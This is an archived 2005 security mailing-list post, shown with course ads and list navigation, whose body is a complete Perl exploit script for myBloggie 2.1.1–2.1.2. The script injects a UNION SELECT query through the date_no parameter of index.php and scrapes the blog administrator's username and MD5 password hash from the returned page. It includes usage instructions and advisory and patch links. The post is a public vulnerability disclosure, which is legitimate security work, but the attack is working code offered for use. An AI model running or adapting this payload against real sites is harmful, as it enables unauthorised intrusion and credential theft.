Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

SQL Injection Exploit for myBloggie 2.1.1 - 2.1.2

from [Alberto Trivero] Network Security [Permanent Link]
Subject: SQL Injection Exploit for myBloggie 2.1.1 - 2.1.2
Date: Fri, 27 May 2005 20:40:42 +0200 
#!/usr/bin/perl -w
#
# SQL Injection Exploit for myBloggie 2.1.1 - 2.1.2
# This exploit show the username of the administrator of the blog and his
password crypted in MD5
# Coded by Alberto Trivero and Discovered with CorryL
# Related advisories: (Italian)
http://www.codebug.org/index.php?subaction=showfull&id=1115310052&archive=&s
tart_from=&ucat=6&
#                     (English)
http://www.packetstormsecurity.org/0505-advisories/codebug-9.txt
# Patch: http://mywebland.com/forums/viewtopic.php?t=180

use LWP::Simple;

print "\n\t=======================================\n";
print "\t= Exploit for myBloggie 2.1.1 - 2.1.2 =\n";
print "\t=    Alberto Trivero - codebug.org    =\n";
print "\t=======================================\n\n";

if(!$ARGV[0] or !($ARGV[0]=~/http/) or !$ARGV[1] or ($ARGV[1] ne '2.1.1' and
$ARGV[1] ne '2.1.2')) {
   print "Usage:\nperl $0 [full_target_path] [version: 2.1.1 OR
2.1.2]\n\nExample:\nperl $0 http://www.example.com/mybloggie/ 2.1.1\n";
   exit(0);
}

$url=q[index.php?month_no=1&year=1&mode=viewdate&date_no=1%20UNION%20SELECT%
20null,null,null,null,user,password,null,null,null,null%20FROM%20blog_user/*
];
$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
if($ARGV[1] eq '2.1.1') {
   $page=~m/<tr><td colspan="3" class="subject">(.*?)<\/td><\/tr>/ && print
"[+] Username of administrator is: $1\n";
   print "[-] Unable to retrieve username\n" if(!$1);
}
else {
   $page=~m/<img src="templates\/aura\/images\/permalink.gif" border="0"
title="Permalink"><\/a> (.*?)<\/td><\/tr>/ && print "[+] Username of
administrator is: $1\n";
   print "[-] Unable to retrieve username\n" if(!$1);
}
$page=~m/<tr><td colspan="3" class="message">(.*?)<\/td><\/tr>/ && print
"[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash\n" if(!$1);
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • SQL Injection Exploit for myBloggie 2.1.1 - 2.1.2, Alberto Trivero <=
Previous by Date:  Re: User32.dll Icon Size Crash, Daniel Souza
Next by Date:  [Full-disclosure] Cygwin Bash Buffer Overflow, Rodrigo Gutierrez
Previous by Thread:  Re: [SECURITY] [DSA 729-1] New PHP4 packages fix denial of service, John GALLET
Next by Thread:  [Full-disclosure] Cygwin Bash Buffer Overflow, Rodrigo Gutierrez
Indexes:  [Date] [Thread] [Top] [All Lists]